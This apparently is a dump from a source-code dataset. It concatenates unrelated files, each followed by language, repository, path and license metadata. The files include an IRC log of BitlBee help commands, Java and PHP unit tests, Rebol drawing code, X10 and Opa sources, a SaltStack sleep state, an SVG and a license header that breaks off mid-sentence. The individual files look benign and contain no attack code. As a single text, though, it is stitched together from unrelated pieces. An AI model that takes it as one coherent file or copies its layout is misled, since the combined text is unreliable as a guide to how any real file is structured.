2016-03-14 23:18:15 > fsociety (whoami@localhost) has joined &jabber 2016-03-14 23:18:15 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-15 09:46:51 - irc: disconnected from server 2016-03-15 09:46:53 > fsociety (whoami@localhost) has joined &jabber 2016-03-15 09:46:53 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-15 10:30:23 - irc: disconnected from server 2016-03-15 10:30:24 > fsociety (whoami@localhost) has joined &jabber 2016-03-15 10:30:24 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 06:23:45 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 06:23:45 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 07:17:58 - irc: disconnected from server 2016-03-16 07:18:00 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 07:18:00 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 07:18:12 - irc: disconnected from server 2016-03-16 07:18:22 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 07:18:22 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 07:19:06 - irc: disconnected from server 2016-03-16 07:19:08 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 07:19:08 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 07:19:21 - irc: disconnected from server 2016-03-16 07:19:26 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 07:19:26 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 07:33:47 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 07:33:47 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 11:43:39 - irc: disconnected from server 2016-03-16 11:43:41 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 11:43:41 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 20:28:26 - irc: disconnected from server 2016-03-16 20:28:31 > fsociety (whoami@localhost) has joined &jabber 2016-03-16 20:28:31 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-16 20:36:40 - irc: disconnected from server 2016-03-17 02:36:24 > fsociety (whoami@localhost) has joined &jabber 2016-03-17 02:36:24 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-17 15:50:32 - irc: disconnected from server 2016-03-17 19:44:26 > fsociety (whoami@localhost) has joined &jabber 2016-03-17 19:44:26 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-18 20:03:53 - irc: disconnected from server 2016-03-19 07:19:27 > fsociety (whoami@localhost) has joined &jabber 2016-03-19 07:19:27 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-19 08:27:27 > fsociety (whoami@localhost) has joined &jabber 2016-03-19 08:27:27 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-19 12:41:37 @fsociety help 2016-03-19 12:41:37 @root These are the available help subjects: 2016-03-19 12:41:37 @root 2016-03-19 12:41:37 @root quickstart - A short introduction into BitlBee 2016-03-19 12:41:37 @root commands - All available commands and settings 2016-03-19 12:41:37 @root channels - About creating and customizing channels 2016-03-19 12:41:37 @root away - About setting away states 2016-03-19 12:41:37 @root groupchats - How to work with groupchats on BitlBee 2016-03-19 12:41:37 @root nick_changes - Changing your nickname without losing any settings 2016-03-19 12:41:37 @root smileys - A summary of some non-standard smileys you might find and fail to understand 2016-03-19 12:41:37 @root 2016-03-19 12:41:37 @root You can read more about them with help <subject> 2016-03-19 12:41:37 @root 2016-03-19 12:41:37 @root Some more help can be found on http://wiki.bitlbee.org/. Bugs can be reported at http://bugs.bitlbee.org/. 2016-03-19 12:41:37 @root 2016-03-19 12:41:37 @root For other things than bug reports, you can join #BitlBee on OFTC (irc.oftc.net) (OFTC, *not* FreeNode!) and flame us right in the face. :-) 2016-03-19 12:41:49 @fsociety help channels 2016-03-19 12:41:49 @root You can have as many channels in BitlBee as you want. You maintain your channel list using the channel command. You can create new channels by just joining them, like on regular IRC networks. 2016-03-19 12:41:49 @root 2016-03-19 12:41:49 @root You can create two kinds of channels. Control channels, and groupchat channels. By default, BitlBee will set up new channels as control channels if their name starts with an &, and as chat channels if it starts with a #. 2016-03-19 12:41:49 @root 2016-03-19 12:41:49 @root Control channels are where you see your contacts. By default, you will have one control channel called &bitlbee, containing all your contacts. But you can create more, if you want, and divide your contact list accross several channels. 2016-03-19 12:41:49 @root 2016-03-19 12:41:49 @root For example, you can have one channel with all contacts from your MSN Messenger account in it. Or all contacts from the group called "Work". 2016-03-19 12:41:49 @root 2016-03-19 12:41:49 @root Type help channels2 to read more. 2016-03-19 12:41:53 @fsociety help channels2 2016-03-19 12:41:53 @root When you create a new channel, BitlBee will try to guess from its name which contacts to fill it with. For example, if the channel name (excluding the &) matches the name of a group in which you have one or more contacts, the channel will contain all those contacts. 2016-03-19 12:41:53 @root 2016-03-19 12:41:53 @root Any valid account ID (so a number, protocol name or part of screenname, as long as it's unique) can also be used as a channel name. So if you just join &msn, it will contain all your MSN contacts. And if you have a Facebook account set up, you can see its contacts by just joining &facebook. 2016-03-19 12:41:53 @root 2016-03-19 12:41:53 @root To start a simple group chat, you simply join a channel which a name starting with #, and invite people into it. All people you invite have to be on the same IM network and contact list. 2016-03-19 12:41:53 @root 2016-03-19 12:41:53 @root If you want to configure your own channels, you can use the channel set command. See help channels3 for more information. 2016-03-19 12:42:01 @fsociety help channels3 2016-03-19 12:42:01 @root The most important setting for a control channel is fill_by. It tells BitlBee what information should be used to decide if someone should be shown in the channel or not. After setting this setting to, for example, account, you also have to set the account setting. Example: 2016-03-19 12:42:01 @root 2016-03-19 12:42:01 @root <wilmer> chan &wlm set fill_by account 2016-03-19 12:42:01 @root <root> fill_by = `account' 2016-03-19 12:42:01 @root <wilmer> chan &wlm set account msn 2016-03-19 12:42:01 @root <root> account = `msn' 2016-03-19 12:42:01 @root 2016-03-19 12:42:01 @root Also, each channel has a show_users setting which lets you choose, for example, if you want to see only online contacts in a channel, or also/just offline contacts. Example: 2016-03-19 12:42:01 @root 2016-03-19 12:42:01 @root <wilmer> chan &offline set show_users offline 2016-03-19 12:42:01 @root <root> show_users = `offline' 2016-03-19 12:42:01 @root 2016-03-19 12:42:01 @root See the help information for all these settings for more information. 2016-03-19 12:42:09 @fsociety chan &jabber delete 2016-03-19 12:42:09 @root Unknown command: channel [...] &jabber. Please use help commands to get a list of available commands. 2016-03-19 12:42:16 @fsociety channel help 2016-03-19 12:42:16 @root Could not find channel `help' 2016-03-19 12:42:19 @fsociety help channel 2016-03-19 12:42:19 @root Syntax: channel [<account id>] <action> [<arguments>] 2016-03-19 12:42:19 @root 2016-03-19 12:42:19 @root Available actions: del, list, set. See help channel <action> for more information. 2016-03-19 12:42:19 @root 2016-03-19 12:42:19 @root There is no channel add command. To create a new channel, just use the IRC /join command. See also help channels and help groupchats. 2016-03-19 12:42:28 @fsociety help groupchats 2016-03-19 12:42:28 @root BitlBee now supports groupchats on all IM networks. This text will try to explain you how they work. 2016-03-19 12:42:28 @root 2016-03-19 12:42:28 @root As soon as someone invites you into a groupchat, you will be force-joined or invited (depending on the protocol) into a new virtual channel with all the people in there. You can leave the channel at any time, just like you would close the window in regular IM clients. Please note that root-commands don't work in groupchat channels, they only work in control channels (or to root directly). 2016-03-19 12:42:28 @root 2016-03-19 12:42:28 @root Of course you can also create your own groupchats. Type help groupchats2 to see how. 2016-03-19 12:42:40 @fsociety channel &jabber del 2016-03-19 12:42:40 @root Couldn't remove channel (main channel &bitlbee or channels you're still in cannot be deleted). 2016-03-19 12:43:27 - irc: disconnected from server 2016-03-19 12:43:48 > fsociety (whoami@localhost) has joined &jabber 2016-03-19 12:43:48 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-19 12:48:56 - irc: disconnected from server 2016-03-19 12:50:45 > fsociety (whoami@localhost) has joined &jabber 2016-03-19 12:50:45 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals)
IRC log
1
0x4b1dN/2016-dots
misc/weechat/logs/irc.bitlbee.&jabber.weechatlog
[ "MIT" ]
/* * Copyright (C) 2007 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.collect; import static com.google.common.base.Preconditions.checkArgument; import com.google.common.collect.Synchronized.SynchronizedBiMap; import com.google.common.collect.Synchronized.SynchronizedSet; import com.google.common.collect.testing.features.CollectionFeature; import com.google.common.collect.testing.features.CollectionSize; import com.google.common.collect.testing.features.MapFeature; import com.google.common.collect.testing.google.BiMapInverseTester; import com.google.common.collect.testing.google.BiMapTestSuiteBuilder; import com.google.common.collect.testing.google.TestStringBiMapGenerator; import java.util.Map.Entry; import java.util.Set; import junit.framework.TestSuite; /** * Tests for {@code Synchronized#biMap}. * * @author Mike Bostock */ public class SynchronizedBiMapTest extends SynchronizedMapTest { public static TestSuite suite() { TestSuite suite = new TestSuite(SynchronizedBiMapTest.class); suite.addTest( BiMapTestSuiteBuilder.using(new SynchTestingBiMapGenerator()) .named("Synchronized.biMap[TestBiMap]") .withFeatures( CollectionSize.ANY, CollectionFeature.SUPPORTS_ITERATOR_REMOVE, MapFeature.ALLOWS_NULL_KEYS, MapFeature.ALLOWS_NULL_VALUES, MapFeature.ALLOWS_ANY_NULL_QUERIES, MapFeature.GENERAL_PURPOSE, MapFeature.REJECTS_DUPLICATES_AT_CREATION) .createTestSuite()); suite.addTest( BiMapTestSuiteBuilder.using(new SynchronizedHashBiMapGenerator()) .named("synchronizedBiMap[HashBiMap]") .withFeatures( CollectionSize.ANY, CollectionFeature.SUPPORTS_ITERATOR_REMOVE, MapFeature.ALLOWS_NULL_KEYS, MapFeature.ALLOWS_NULL_VALUES, MapFeature.ALLOWS_ANY_NULL_QUERIES, MapFeature.GENERAL_PURPOSE, MapFeature.REJECTS_DUPLICATES_AT_CREATION, CollectionFeature.SERIALIZABLE) .suppressing(BiMapInverseTester.getInverseSameAfterSerializingMethods()) .createTestSuite()); return suite; } @Override protected <K, V> BiMap<K, V> create() { TestBiMap<K, V> inner = new TestBiMap<>(HashBiMap.<K, V>create(), mutex); BiMap<K, V> outer = Synchronized.biMap(inner, mutex); return outer; } public static final class SynchronizedHashBiMapGenerator extends TestStringBiMapGenerator { @Override protected BiMap<String, String> create(Entry<String, String>[] entries) { Object mutex = new Object(); BiMap<String, String> result = HashBiMap.create(); for (Entry<String, String> entry : entries) { checkArgument(!result.containsKey(entry.getKey())); result.put(entry.getKey(), entry.getValue()); } return Maps.synchronizedBiMap(result); } } public static final class SynchTestingBiMapGenerator extends TestStringBiMapGenerator { @Override protected BiMap<String, String> create(Entry<String, String>[] entries) { Object mutex = new Object(); BiMap<String, String> backing = new TestBiMap<>(HashBiMap.<String, String>create(), mutex); BiMap<String, String> result = Synchronized.biMap(backing, mutex); for (Entry<String, String> entry : entries) { checkArgument(!result.containsKey(entry.getKey())); result.put(entry.getKey(), entry.getValue()); } return result; } } static class TestBiMap<K, V> extends TestMap<K, V> implements BiMap<K, V> { private final BiMap<K, V> delegate; public TestBiMap(BiMap<K, V> delegate, Object mutex) { super(delegate, mutex); this.delegate = delegate; } @Override public V forcePut(K key, V value) { assertTrue(Thread.holdsLock(mutex)); return delegate.forcePut(key, value); } @Override public BiMap<V, K> inverse() { assertTrue(Thread.holdsLock(mutex)); return delegate.inverse(); } @Override public Set<V> values() { assertTrue(Thread.holdsLock(mutex)); return delegate.values(); } private static final long serialVersionUID = 0; } public void testForcePut() { create().forcePut(null, null); } public void testInverse() { BiMap<String, Integer> bimap = create(); BiMap<Integer, String> inverse = bimap.inverse(); assertSame(bimap, inverse.inverse()); assertTrue(inverse instanceof SynchronizedBiMap); assertSame(mutex, ((SynchronizedBiMap<?, ?>) inverse).mutex); } @Override public void testValues() { BiMap<String, Integer> map = create(); Set<Integer> values = map.values(); assertTrue(values instanceof SynchronizedSet); assertSame(mutex, ((SynchronizedSet<?>) values).mutex); } }
Java
5
ksodhi2/guava
android/guava-tests/test/com/google/common/collect/SynchronizedBiMapTest.java
[ "Apache-2.0" ]
require "./compiler_spec" require "./std_spec" require "./primitives_spec"
Crystal
0
jessedoyle/crystal
spec/all_spec.cr
[ "Apache-2.0" ]
/* Copyright © 2011, 2012 MLstate This file is part of Opa. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ /** * Mongo driver failure status. * Either a failure document returned by the MongoDB server, * an error string generated by the driver or [Incomplete] * which signals that expected fields were missing from a reply. * The [OK] value is for a connection which has been initialised but never used. **/ type Mongo.failure = {OK} / {Error : string} / {DocError : Bson.document} / {Incomplete} / {NotFound} / {SlaveOK} /** Type for a connection, host name and port **/ type Mongo.mongo_host = (string, int) type Mongo.auth = { user:string; password:string; } type Mongo.auths = list(Mongo.auth)
Opa
4
Machiaweliczny/oppailang
lib/stdlib/apis/mongo/type.opa
[ "MIT" ]
sleep_running: module.run: - name: test.sleep - length: 20
SaltStack
2
byteskeptical/salt
tests/integration/files/file/base/running.sls
[ "Apache-2.0" ]
REBOL [ Title: "Basic DRAW test" Date: 24-Sep-2010 Author: "Cyphre" Purpose: "Tests many of the basic DRAW dialect commands, eg. lines, boxes, curves, fills etc." ] do %gfx-pre.r3 black: 0.0.0 white: 255.255.255 red: 255.0.0 green: 0.255.0 blue: 0.0.255 yellow: 255.255.0 img1: load %dev-small.jpg img1-alpha: copy img1 oft: 0x0 siz: img1-alpha/size - 1 repeat y siz/y [ repeat x siz/x [ pos: as-pair x + oft/x y + oft/y pix: pick img1-alpha pos pix/4: to-integer (x * (255 / siz/x)) poke img1-alpha pos pix ] ] img2: make image! [44x44] change/dup img2 255.0.0 22x22 change/dup at img2 22x0 0.255.0 22x22 change/dup at img2 0x22 0.0.255 22x22 change/dup at img2 22x22 255.255.0 22x22 draw-block: to-draw [ pen 0.127.127 fill-pen 218.188.189 anti-alias on line-width 1 line-cap square line-join bevel ;ANTI-ALIAS translate 25x25 arc 0x0 25x25 0 90 translate 50x0 arc 0x0 25x25 0 180 translate 0x50 arc 0x0 25x25 0 270 translate -50x0 arc 0x0 25x25 0 360 translate 105x-50 arc 0x0 25x25 0 90 closed translate 50x0 arc 0x0 25x25 0 180 closed translate 0x50 arc 0x0 25x25 0 270 closed translate -50x0 arc 0x0 25x25 0 360 closed ;ARROW reset-matrix translate 200x0 translate 10x0 line 0x90 0x10 arrow 1x0 translate 10x0 line 0x90 0x10 arrow 2x0 translate 10x0 line 0x90 0x10 arrow 0x1 translate 10x0 line 0x90 0x10 arrow 0x2 translate 10x0 line 0x90 0x10 arrow 1x2 translate 10x0 line 0x90 0x10 arrow 2x1 translate 10x0 line 0x90 0x10 arrow 1x1 translate 10x0 line 0x90 0x10 arrow 2x2 translate 10x0 line 0x90 0x10 arrow 0x0 reset-matrix translate 300x0 translate 0x10 line 10x0 90x0 arrow 1x0 translate 0x10 line 10x0 90x0 arrow 2x0 translate 0x10 line 10x0 90x0 arrow 0x1 translate 0x10 line 10x0 90x0 arrow 0x2 translate 0x10 line 10x0 90x0 arrow 1x2 translate 0x10 line 10x0 90x0 arrow 2x1 translate 0x10 line 10x0 90x0 arrow 1x1 translate 0x10 line 10x0 90x0 arrow 2x2 translate 0x10 line 10x0 90x0 arrow 0x0 ;BOX reset-matrix translate 400x0 box 5x5 95x95 translate 100x0 box 5x5 95x45 box 5x50 95x95 10 translate 100x0 box 5x5 45x95 box 50x5 95x95 10 translate 100x0 box 5x5 95x95 10 ;CIRCLE reset-matrix translate 0x100 circle 50x50 45 translate 100x0 circle 50x50 45 22.5 translate 100x0 circle 50x50 22.5 45 ;CURVE reset-matrix translate 300x100 curve 0x0 100x0 100x100 translate 100x0 curve 0x0 100x0 0x100 100x100 ;ELLIPSE reset-matrix translate 500x100 ellipse 5x5 95x95 translate 100x0 ellipse 5x25 95x50 translate 100x0 ellipse 25x5 50x95 ;IMAGE reset-matrix translate 0x200 image-filter bilinear image img1 image-options border image 50x50 img1 image-options no-border translate 100x0 image img1 5x5 95x95 translate 100x0 image img1 30x5 70x95 translate 100x0 image 5x30 95x30 95x70 img1 reset-matrix translate 450x250 rotate 45 image-options border image img1 -35x-35 35x35 rotate -45 translate 50x-50 image-options no-border image img1 35x35 70x15 90x95 10x95 translate 100x0 image-options border image img1 15x5 95x20 55x75 20x93 translate 100x0 image-options border 255.0.0 image img2 5x5 image-options border 0.255.0 image img2 49x5 image-options border 0.0.255 image img2 5x49 image-options border 255.0.0 image img2 49x49 reset-matrix translate 0x300 image-options no-border image-pattern repeat image img1 5x5 95x95 translate 100x0 image-pattern repeat 0x0 100x100 image img1 5x5 95x95 translate 100x0 image-pattern repeat 25x25 100x100 image img1 5x5 95x95 translate 100x0 image-pattern repeat 0x0 200x200 image img1 5x5 95x95 translate 100x0 image-pattern reflect image img1 5x5 95x95 translate 100x0 image-pattern reflect 0x0 100x100 image img1 5x5 95x95 translate 100x0 image-pattern reflect 25x25 100x100 image img1 5x5 95x95 translate 100x0 image-pattern reflect 0x0 200x200 image img1 5x5 95x95 reset-matrix translate 0x400 image-pattern repeat image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern repeat 0x0 100x100 image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern repeat 25x25 100x100 image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern repeat 0x0 200x200 image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern reflect image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern reflect 0x0 100x100 image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern reflect 25x25 100x100 image img1 35x5 65x5 95x95 5x95 translate 100x0 image-pattern reflect 0x0 200x200 image img1 35x5 65x5 95x95 5x95 ;LINE reset-matrix translate 0x500 line 5x5 95x5 line 5x15 95x15 line 5x25 95x25 line 5x35 95x35 line 5x45 95x45 line 5x55 95x55 line 5x65 95x65 line 5x75 95x75 line 5x85 95x85 line 5x95 95x95 translate 100x0 line 5x5 5x95 line 15x5 15x95 line 25x5 25x95 line 35x5 35x95 line 45x5 45x95 line 55x5 55x95 line 65x5 65x95 line 75x5 75x95 line 85x5 85x95 line 95x5 95x95 translate 100x0 line 5x5 95x5 5x15 95x15 5x25 95x25 5x35 95x35 5x45 95x45 5x55 95x55 5x65 95x65 5x75 95x75 5x85 95x85 5x95 95x95 translate 100x0 line 5x5 5x95 15x5 15x95 25x5 25x95 35x5 35x95 45x5 45x95 55x5 55x95 65x5 65x95 75x5 75x95 85x5 85x95 95x5 95x95 translate 100x0 line 5x85 15x95 line 5x75 25x95 line 5x65 35x95 line 5x55 45x95 line 5x45 55x95 line 5x35 65x95 line 5x25 75x95 line 5x15 85x95 line 5x5 95x95 line 15x5 95x85 line 25x5 95x75 line 35x5 95x65 line 45x5 95x55 line 55x5 95x45 line 65x5 95x35 line 75x5 95x25 line 85x5 95x15 translate 100x0 line 5x15 15x5 line 5x25 25x5 line 5x35 35x5 line 5x45 45x5 line 5x55 55x5 line 5x65 65x5 line 5x75 75x5 line 5x85 85x5 line 5x95 95x5 line 15x95 95x15 line 25x95 95x25 line 35x95 95x35 line 45x95 95x45 line 55x95 95x55 line 65x95 95x65 line 75x95 95x75 line 85x95 95x85 translate 100x0 line 5x85 15x95 5x75 25x95 5x65 35x95 5x55 45x95 5x45 55x95 5x35 65x95 5x25 75x95 5x15 85x95 5x5 95x95 15x5 95x85 25x5 95x75 35x5 95x65 45x5 95x55 55x5 95x45 65x5 95x35 75x5 95x25 85x5 95x15 translate 100x0 line 5x15 15x5 5x25 25x5 5x35 35x5 5x45 45x5 5x55 55x5 5x65 65x5 5x75 75x5 5x85 85x5 5x95 95x5 15x95 95x15 25x95 95x25 35x95 95x35 45x95 95x45 55x95 95x55 65x95 95x65 75x95 95x75 85x95 95x85 ;POLYGON reset-matrix translate 0x600 polygon 50x5 62x40 95x40 68x60 80x95 50x74 20x95 32x60 5x40 38x40 translate 100x0 polygon 50x5 95x28 95x72 50x95 5x72 5x28 translate 100x0 polygon 14x59 17x85 92x57 94x32 52x38 59x15 translate 100x0 polygon 5x15 15x5 5x35 35x5 5x55 55x5 5x75 75x5 5x95 95x5 15x95 95x15 35x95 95x35 55x95 95x55 75x95 95x75 85x95 95x85 ;SPLINE translate 100x0 spline 87x71 86x28 50x9 15x30 17x69 50x86 80x67 79x33 50x17 23x34 24x64 50x78 73x63 71x37 50x26 30x38 31x60 50x69 65x59 64x41 49x34 37x42 38x56 50x61 58x54 57x45 50x42 44x47 46x52 50x53 51x50 50x49 translate 100x0 spline 2 87x71 86x28 50x9 15x30 17x69 50x86 80x67 79x33 50x17 23x34 24x64 50x78 73x63 71x37 50x26 30x38 31x60 50x69 65x59 64x41 49x34 37x42 38x56 50x61 58x54 57x45 50x42 44x47 46x52 50x53 51x50 50x49 translate 100x0 spline 3 87x71 86x28 50x9 15x30 17x69 50x86 80x67 79x33 50x17 23x34 24x64 50x78 73x63 71x37 50x26 30x38 31x60 50x69 65x59 64x41 49x34 37x42 38x56 50x61 58x54 57x45 50x42 44x47 46x52 50x53 51x50 50x49 translate 100x0 spline 5 87x71 86x28 50x9 15x30 17x69 50x86 80x67 79x33 50x17 23x34 24x64 50x78 73x63 71x37 50x26 30x38 31x60 50x69 65x59 64x41 49x34 37x42 38x56 50x61 58x54 57x45 50x42 44x47 46x52 50x53 51x50 50x49 closed ;TRIANGLE reset-matrix translate 0x700 triangle 50x5 95x95 translate 100x0 triangle 50x5 95x95 5x95 translate 100x0 triangle 50x5 95x95 5x95 red translate 100x0 triangle 50x5 95x95 5x95 green 2 translate 100x0 triangle 50x5 95x95 5x95 blue -2 translate 100x0 triangle 50x5 95x95 5x95 red green translate 100x0 triangle 50x5 95x95 5x95 red green blue translate 100x0 triangle 50x5 95x95 5x95 255.0.0.200 0.255.0.200 0.0.255.200 ;SHAPE ;TEXT ] copy [] print "Generating DRAW graphics.." img: make image! [800x800 255.255.255] write %draw.png encode 'png draw img draw-block print "Output has been succesfully written to draw.png file." halt
Rebol
5
Pointillistic/rebol-lang
tests/draw-test.r3
[ "Apache-2.0" ]
/** * * TimedWeight.x10 * * Rudra Distributed Learning Platform * * Copyright (c) IBM Corporation 2016 * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of Rudra nor the names of its contributors may be used * to endorse or promote products derived from this software without specific * prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY,OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ package rudra; /** TimedWeight is the same as TimedGradient except that the payload rail is of networkSize rather than networkSize+1. It represents a time stamped set of weights for the NN, together with loadSize that represents the number of MB used to compute this weight. @author vj */ public class TimedWeight(size:Long) implements TimedWeightI { // mutated in place, hence fields are vars. public static val POISON=new TimedWeight(0,0un); var timeStamp:UInt=0un; var loadSize:UInt=0un; var weight:Rail[Float] = new Rail[Float](size); def this(size:Long){property(size);} def this(size:Long, ls:UInt){property(size); loadSize=ls;} public def loadSize():UInt=loadSize; public def setLoadSize(l:UInt):void{ loadSize=l; } public def weightRail() = weight; public def timeStamp() = timeStamp; public def setTimeStamp(t:UInt):void { timeStamp = t; } def calcHash():Float = calcHash(weight); public static def calcHash(f:Rail[Float]):Float { var result:Float=0.0f; for (x in f) result+=x; return result/f.size; } public def toString():String = "<TW #" + hashCode() + " load="+ calcHash() +",size="+ loadSize + ",time="+timeStamp+">"; }
X10
5
milthorpe/rudra
x10/src/rudra/TimedWeight.x10
[ "BSD-3-Clause" ]
--TEST-- ZE2 ArrayAccess and ASSIGN_OP operators (.=) --FILE-- <?php class Peoples implements ArrayAccess { public $person; function __construct() { $this->person = array(array('name'=>'Foo')); } function offsetExists($index): bool { return array_key_exists($this->person, $index); } function offsetGet($index): mixed { return $this->person[$index]; } function offsetSet($index, $value): void { $this->person[$index] = $value; } function offsetUnset($index): void { unset($this->person[$index]); } } $people = new Peoples; var_dump($people->person[0]['name']); $people->person[0]['name'] = $people->person[0]['name'] . 'Bar'; var_dump($people->person[0]['name']); $people->person[0]['name'] .= 'Baz'; var_dump($people->person[0]['name']); echo "===ArrayOverloading===\n"; $people = new Peoples; var_dump($people[0]['name']); $people[0]['name'] = 'FooBar'; var_dump($people[0]['name']); $people[0]['name'] = $people->person[0]['name'] . 'Bar'; var_dump($people[0]['name']); $people[0]['name'] .= 'Baz'; var_dump($people[0]['name']); ?> --EXPECTF-- string(3) "Foo" string(6) "FooBar" string(9) "FooBarBaz" ===ArrayOverloading=== string(3) "Foo" Notice: Indirect modification of overloaded element of Peoples has no effect in %sarray_access_008.php on line 40 string(3) "Foo" Notice: Indirect modification of overloaded element of Peoples has no effect in %sarray_access_008.php on line 42 string(3) "Foo" Notice: Indirect modification of overloaded element of Peoples has no effect in %sarray_access_008.php on line 44 string(3) "Foo"
PHP
3
NathanFreeman/php-src
tests/classes/array_access_008.phpt
[ "PHP-3.01" ]
declare const _CFLAGS_: { GATSBY_MAJOR: string } export const usingGatsbyV4OrGreater = Number(_CFLAGS_.GATSBY_MAJOR) >= 4
TypeScript
3
waltercruz/gatsby
packages/gatsby-source-wordpress/src/utils/gatsby-version.ts
[ "MIT" ]
fileFormatVersion: 2 guid: be419f7ed5c24b24a6f2636d3b107535 timeCreated: 1537915674
Unity3D Asset
0
bobcy2015/ml-agents
com.unity.ml-agents/Tests/Editor/EditModeTestInternalBrainTensorApplier.cs.meta
[ "Apache-2.0" ]
<svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg"> <circle cx="9" cy="9" r="9" fill="none"/> <path d="M5 9H13" stroke="#BFC7CF" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round"/> </svg>
SVG
3
dany-freeman/material-ui
docs/public/static/branding/pricing/no-light.svg
[ "MIT" ]
module com.networknt.handler { exports com.networknt.handler; exports com.networknt.handler.config; requires com.networknt.status; requires com.networknt.utility; requires com.networknt.config; requires com.networknt.service; requires undertow.core; requires org.slf4j; }
Jasmin
3
KellyShao/light-4j
handler/src/main/java/module-info.j
[ "Apache-2.0" ]
# ============================================================================== # LLVM Release License # ============================================================================== # University of Illinois/NCSA # Open Source License # Copyright (c) 2003-2017 University of Illinois at Urbana-Champaign. # All rights reserved. # Developed by: # LLVM Team # University of Illinois at Urbana-Champaign # http://llvm.org # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal with # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is furnished to do # so, subject to the following conditions: # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimers. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimers in the # documentation and/or other materials provided with the distribution. # * Neither the names of the LLVM Team, University of Illinois at # Urbana-Champaign, nor the names of its contributors may be used to # endorse or promote products derived from this Software without specific # prior written permission. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES 